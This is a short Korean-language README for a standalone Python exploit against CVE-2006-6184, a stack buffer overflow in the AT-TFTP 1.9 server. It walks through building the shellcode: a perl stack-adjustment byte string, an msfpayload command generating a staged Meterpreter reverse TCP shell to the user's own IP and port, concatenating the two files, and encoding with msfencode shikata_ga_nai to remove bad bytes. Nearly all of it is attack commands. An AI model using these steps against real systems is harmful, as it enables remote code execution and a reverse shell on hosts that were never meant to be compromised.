
https://github.com/shauntdergrigorian/cve-2006-6184의 단순화된 버전
이것은 CVE-2006-6184를 위한 파이썬 기반의 독립 실행형 익스플로잇입니다. 이 익스플로잇은 Allied Telesyn TFTP Server (AT-TFTP) 1.9 및 이전 버전에서 스택 기반 버퍼 오버플로를 유발하여, 원격 공격자가 서비스 거부를 일으키거나 임의의 코드를 실행할 수 있게 합니다.
그렇게 쉬울 거라고 생각하지 않았겠죠? 페이로드는 자신의 IP 주소와 리스닝 포트를 포함하도록 커스터마이즈되어야 하므로, 직접 생성해야 합니다. 그렇게 하려면 다음 단계를 사용하세요:
1.) 스택 포인터에서 빼야 하는 양(3500)의 헥스 파일을 생성하려면 다음을 입력하세요:
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) 다음으로, 아래 명령을 사용하여 스테이징된 meterpreter 셸 페이로드를 생성하세요:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) 그런 다음, 방금 생성한 두 파일을 결합하세요.
cat stackadj payload > shellcode
4.) 마지막으로, 나쁜 문자들을 제거합시다.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
출력값을 "payload" 변수의 값으로 입력하세요.